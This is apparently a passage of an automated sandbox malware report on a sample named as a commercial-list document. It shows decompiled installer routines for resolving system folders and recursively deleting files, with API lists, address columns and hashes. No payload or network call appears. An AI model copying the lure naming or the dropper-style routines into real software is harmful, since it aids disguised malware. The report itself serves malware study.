				if(_a4 >= 0x42d3a0 && _a4 - 0x42d3a0 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405D51(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x42d3a0;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = "7580360" + (_t96 << 0xa);
							E00405D2F(_t87, "7580360" + (_t96 << 0xa));
						} else {
							E00405C8D(_t87,  *0x42e408);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405F9A(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42e484;
						if( *0x42e484 != 0) {
							_t98 = 4;
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x42e404;
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x42e408,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x42e408,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x42e438;
							E00405C16(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x42e438, _t87, _t70 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405D51(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405D2F(_a4, _t38);
			}





























                                                                                                                                                                                  0x00405d51
                                                                                                                                                                                  0x00405d51
                                                                                                                                                                                  0x00405d51
                                                                                                                                                                                  0x00405d57
                                                                                                                                                                                  0x00405d5c
                                                                                                                                                                                  0x00405d5e
                                                                                                                                                                                  0x00405d6d
                                                                                                                                                                                  0x00405d6d
                                                                                                                                                                                  0x00405d75
                                                                                                                                                                                  0x00405d76
                                                                                                                                                                                  0x00405d78
                                                                                                                                                                                  0x00405d80
                                                                                                                                                                                  0x00405d81
                                                                                                                                                                                  0x00405d82
                                                                                                                                                                                  0x00405d84
                                                                                                                                                                                  0x00405d9b
                                                                                                                                                                                  0x00405d9e
                                                                                                                                                                                  0x00405d9e
                                                                                                                                                                                  0x00405f77
                                                                                                                                                                                  0x00405f77
                                                                                                                                                                                  0x00405f7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405dab
                                                                                                                                                                                  0x00405db1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405db7
                                                                                                                                                                                  0x00405db8
                                                                                                                                                                                  0x00405dbb
                                                                                                                                                                                  0x00405dbe
                                                                                                                                                                                  0x00405f6a
                                                                                                                                                                                  0x00405f74
                                                                                                                                                                                  0x00405f76
                                                                                                                                                                                  0x00405f76
                                                                                                                                                                                  0x00405f6c
                                                                                                                                                                                  0x00405f6e
                                                                                                                                                                                  0x00405f70
                                                                                                                                                                                  0x00405f71
                                                                                                                                                                                  0x00405f71
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405f6a
                                                                                                                                                                                  0x00405dc4
                                                                                                                                                                                  0x00405dc8
                                                                                                                                                                                  0x00405dd8
                                                                                                                                                                                  0x00405ddc
                                                                                                                                                                                  0x00405de3
                                                                                                                                                                                  0x00405de6
                                                                                                                                                                                  0x00405dea
                                                                                                                                                                                  0x00405df0
                                                                                                                                                                                  0x00405df3
                                                                                                                                                                                  0x00405df6
                                                                                                                                                                                  0x00405df9
                                                                                                                                                                                  0x00405f14
                                                                                                                                                                                  0x00405f17
                                                                                                                                                                                  0x00405f47
                                                                                                                                                                                  0x00405f4a
                                                                                                                                                                                  0x00405f4f
                                                                                                                                                                                  0x00405f53
                                                                                                                                                                                  0x00405f53
                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                  0x00405f59
                                                                                                                                                                                  0x00405f5e
                                                                                                                                                                                  0x00405f61
                                                                                                                                                                                  0x00405f63
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405f63
                                                                                                                                                                                  0x00405f19
                                                                                                                                                                                  0x00405f1c
                                                                                                                                                                                  0x00405f31
                                                                                                                                                                                  0x00405f38
                                                                                                                                                                                  0x00405f1e
                                                                                                                                                                                  0x00405f25
                                                                                                                                                                                  0x00405f25
                                                                                                                                                                                  0x00405f40
                                                                                                                                                                                  0x00405f43
                                                                                                                                                                                  0x00405f0c
                                                                                                                                                                                  0x00405f0d
                                                                                                                                                                                  0x00405f0d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405f43
                                                                                                                                                                                  0x00405e01
                                                                                                                                                                                  0x00405e02
                                                                                                                                                                                  0x00405e08
                                                                                                                                                                                  0x00405e0a
                                                                                                                                                                                  0x00405e24
                                                                                                                                                                                  0x00405e24
                                                                                                                                                                                  0x00405e2b
                                                                                                                                                                                  0x00405e2b
                                                                                                                                                                                  0x00405e32
                                                                                                                                                                                  0x00405e36
                                                                                                                                                                                  0x00405e36
                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                  0x00405e39
                                                                                                                                                                                  0x00405e72
                                                                                                                                                                                  0x00405e75
                                                                                                                                                                                  0x00405e85
                                                                                                                                                                                  0x00405e88
                                                                                                                                                                                  0x00405e90
                                                                                                                                                                                  0x00405e96
                                                                                                                                                                                  0x00405e96
                                                                                                                                                                                  0x00405ef2
                                                                                                                                                                                  0x00405ef2
                                                                                                                                                                                  0x00405ef4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405e9a
                                                                                                                                                                                  0x00405ea1
                                                                                                                                                                                  0x00405ea2
                                                                                                                                                                                  0x00405ea4
                                                                                                                                                                                  0x00405ebe
                                                                                                                                                                                  0x00405ecc
                                                                                                                                                                                  0x00405ed2
                                                                                                                                                                                  0x00405ed4
                                                                                                                                                                                  0x00405eef
                                                                                                                                                                                  0x00405eef
                                                                                                                                                                                  0x00405eef
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405eef
                                                                                                                                                                                  0x00405eda
                                                                                                                                                                                  0x00405ee5
                                                                                                                                                                                  0x00405eeb
                                                                                                                                                                                  0x00405eed
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405eed
                                                                                                                                                                                  0x00405ea6
                                                                                                                                                                                  0x00405ea9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405eb8
                                                                                                                                                                                  0x00405eba
                                                                                                                                                                                  0x00405ebc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405ebc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405ef2
                                                                                                                                                                                  0x00405e7d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405e3b
                                                                                                                                                                                  0x00405e40
                                                                                                                                                                                  0x00405e56
                                                                                                                                                                                  0x00405e5b
                                                                                                                                                                                  0x00405e5e
                                                                                                                                                                                  0x00405efb
                                                                                                                                                                                  0x00405efb
                                                                                                                                                                                  0x00405eff
                                                                                                                                                                                  0x00405f07
                                                                                                                                                                                  0x00405f07
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405eff
                                                                                                                                                                                  0x00405e68
                                                                                                                                                                                  0x00405ef6
                                                                                                                                                                                  0x00405ef6
                                                                                                                                                                                  0x00405ef9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405ef9
                                                                                                                                                                                  0x00405e39
                                                                                                                                                                                  0x00405e0c
                                                                                                                                                                                  0x00405e10
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405e12
                                                                                                                                                                                  0x00405e16
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                  0x00405e1c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                  0x00405e1c
                                                                                                                                                                                  0x00405f81
                                                                                                                                                                                  0x00405f8b
                                                                                                                                                                                  0x00405f97
                                                                                                                                                                                  0x00405f97
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000), ref: 00405E02
                                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E7D
                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E90
                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,0041B020), ref: 00405ECC
                                                                                                                                                                                  • SHGetPathFromIDListA.SHELL32(0041B020,Call), ref: 00405EDA
                                                                                                                                                                                  • CoTaskMemFree.OLE32(0041B020), ref: 00405EE5
                                                                                                                                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                                                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000), ref: 00405F59
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                  • String ID: 7580360$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                  • API String ID: 900638850-1410639663
                                                                                                                                                                                  • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                                                                                                                  • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                                                                                                  • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 485 4055d1-4055f7 call 40588f 488 405610-405617 485->488 489 4055f9-40560b DeleteFileA 485->489 491 405619-40561b 488->491 492 40562a-40563a call 405d2f 488->492 490 40579a-40579e 489->490 493 405621-405624 491->493 494 405748-40574d 491->494 500 405649-40564a call 4057e8 492->500 501 40563c-405647 lstrcatA 492->501 493->492 493->494 494->490 496 40574f-405752 494->496 498 405754-40575a 496->498 499 40575c-405764 call 406033 496->499 498->490 499->490 509 405766-40577a call 4057a1 call 405589 499->509 503 40564f-405652 500->503 501->503 506 405654-40565b 503->506 507 40565d-405663 lstrcatA 503->507 506->507 508 405668-405686 lstrlenA FindFirstFileA 506->508 507->508 510 40568c-4056a3 call 4057cc 508->510 511 40573e-405742 508->511 524 405792-405795 call 404f48 509->524 525 40577c-40577f 509->525 518 4056a5-4056a9 510->518 519 4056ae-4056b1 510->519 511->494 513 405744 511->513 513->494 518->519 521 4056ab 518->521 522 4056b3-4056b8 519->522 523 4056c4-4056d2 call 405d2f 519->523 521->519 527 4056ba-4056bc 522->527 528 40571d-40572f FindNextFileA 522->528 535 4056d4-4056dc 523->535 536 4056e9-4056f4 call 405589 523->536 524->490 525->498 530 405781-405790 call 404f48 call 405bea 525->530 527->523 531 4056be-4056c2 527->531 528->510 533 405735-405738 FindClose 528->533 530->490 531->523 531->528 533->511 535->528 540 4056de-4056e7 call 4055d1 535->540 545 405715-405718 call 404f48 536->545 546 4056f6-4056f9 536->546 540->528 545->528 547 4056fb-40570b call 404f48 call 405bea 546->547 548 40570d-405713 546->548 547->528 548->528
                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                  			E004055D1(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E0040588F(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42e488 =  *0x42e488 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405D2F(0x42a870, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E004057E8(_t73);
					} else {
						lstrcatA(0x42a870, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x409014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42a870,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E004057CC( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405D2F(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405589(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404F48(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42e488 =  *0x42e488 + 1;
										} else {
											E00404F48(0xfffffff1, _t73);
											E00405BEA(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004055D1(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42a870 - 0x5c;
					if( *0x42a870 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406033(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E004057A1(_t73);
							_t40 = E00405589(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00404F48(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404F48(0xfffffff1, _t73);
							return E00405BEA(_t72, _t73, 0);
						}
						L33:
						 *0x42e488 =  *0x42e488 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                                                                                                                  0x004055db
                                                                                                                                                                                  0x004055e0
                                                                                                                                                                                  0x004055e9
                                                                                                                                                                                  0x004055ec
                                                                                                                                                                                  0x004055f4
                                                                                                                                                                                  0x004055f7
                                                                                                                                                                                  0x004055fa
                                                                                                                                                                                  0x00405602
                                                                                                                                                                                  0x00405604
                                                                                                                                                                                  0x00405605
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405605
                                                                                                                                                                                  0x00405610
                                                                                                                                                                                  0x00405613
                                                                                                                                                                                  0x00405613
                                                                                                                                                                                  0x00405613
                                                                                                                                                                                  0x00405617
                                                                                                                                                                                  0x0040562a
                                                                                                                                                                                  0x00405631
                                                                                                                                                                                  0x00405636
                                                                                                                                                                                  0x0040563a
                                                                                                                                                                                  0x0040564a
                                                                                                                                                                                  0x0040563c
                                                                                                                                                                                  0x00405642
                                                                                                                                                                                  0x00405642
                                                                                                                                                                                  0x0040564f
                                                                                                                                                                                  0x00405652
                                                                                                                                                                                  0x0040565d
                                                                                                                                                                                  0x00405663
                                                                                                                                                                                  0x00405668
                                                                                                                                                                                  0x00405678
                                                                                                                                                                                  0x0040567a
                                                                                                                                                                                  0x00405680
                                                                                                                                                                                  0x00405683
                                                                                                                                                                                  0x00405686
                                                                                                                                                                                  0x0040573e
                                                                                                                                                                                  0x0040573e
                                                                                                                                                                                  0x00405742
                                                                                                                                                                                  0x00405744
                                                                                                                                                                                  0x00405744
                                                                                                                                                                                  0x00405744
                                                                                                                                                                                  0x00405744
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040568c
                                                                                                                                                                                  0x0040568c
                                                                                                                                                                                  0x00405695
                                                                                                                                                                                  0x0040569b
                                                                                                                                                                                  0x004056a0
                                                                                                                                                                                  0x004056a3
                                                                                                                                                                                  0x004056a5
                                                                                                                                                                                  0x004056a9
                                                                                                                                                                                  0x004056ab
                                                                                                                                                                                  0x004056ab
                                                                                                                                                                                  0x004056a9
                                                                                                                                                                                  0x004056ae
                                                                                                                                                                                  0x004056b1
                                                                                                                                                                                  0x004056c4
                                                                                                                                                                                  0x004056c6
                                                                                                                                                                                  0x004056cb
                                                                                                                                                                                  0x004056d2
                                                                                                                                                                                  0x004056ed
                                                                                                                                                                                  0x004056f2
                                                                                                                                                                                  0x004056f4
                                                                                                                                                                                  0x00405718
                                                                                                                                                                                  0x004056f6
                                                                                                                                                                                  0x004056f6
                                                                                                                                                                                  0x004056f9
                                                                                                                                                                                  0x0040570d
                                                                                                                                                                                  0x004056fb
                                                                                                                                                                                  0x004056fe
                                                                                                                                                                                  0x00405706
                                                                                                                                                                                  0x00405706
                                                                                                                                                                                  0x004056f9
                                                                                                                                                                                  0x004056d4
                                                                                                                                                                                  0x004056da
                                                                                                                                                                                  0x004056dc
                                                                                                                                                                                  0x004056e2
                                                                                                                                                                                  0x004056e2
                                                                                                                                                                                  0x004056dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004056d2
                                                                                                                                                                                  0x004056b3
                                                                                                                                                                                  0x004056b6
                                                                                                                                                                                  0x004056b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004056ba
                                                                                                                                                                                  0x004056bc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004056be
                                                                                                                                                                                  0x004056c2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040571d
                                                                                                                                                                                  0x00405727
                                                                                                                                                                                  0x0040572d
                                                                                                                                                                                  0x0040572d
                                                                                                                                                                                  0x00405738
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405738
                                                                                                                                                                                  0x00405654
                                                                                                                                                                                  0x0040565b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405619
                                                                                                                                                                                  0x00405619
                                                                                                                                                                                  0x0040561b
                                                                                                                                                                                  0x00405748
                                                                                                                                                                                  0x0040574a
                                                                                                                                                                                  0x0040574d
                                                                                                                                                                                  0x0040579e
                                                                                                                                                                                  0x0040579e
                                                                                                                                                                                  0x0040579e
                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                  0x00405752
                                                                                                                                                                                  0x0040575d
                                                                                                                                                                                  0x00405762
                                                                                                                                                                                  0x00405764
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405767
                                                                                                                                                                                  0x00405773
                                                                                                                                                                                  0x00405778
                                                                                                                                                                                  0x0040577a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405795
                                                                                                                                                                                  0x0040577c
                                                                                                                                                                                  0x0040577f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405784
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040578b
                                                                                                                                                                                  0x00405754
                                                                                                                                                                                  0x00405754
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405754
                                                                                                                                                                                  0x00405621
                                                                                                                                                                                  0x00405624
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405624

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DeleteFileA.KERNELBASE(?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                                                                                                  • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                                                                                                  • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe", xrefs: 004055D1
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                                                                                                  • \*.*, xrefs: 0040563C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
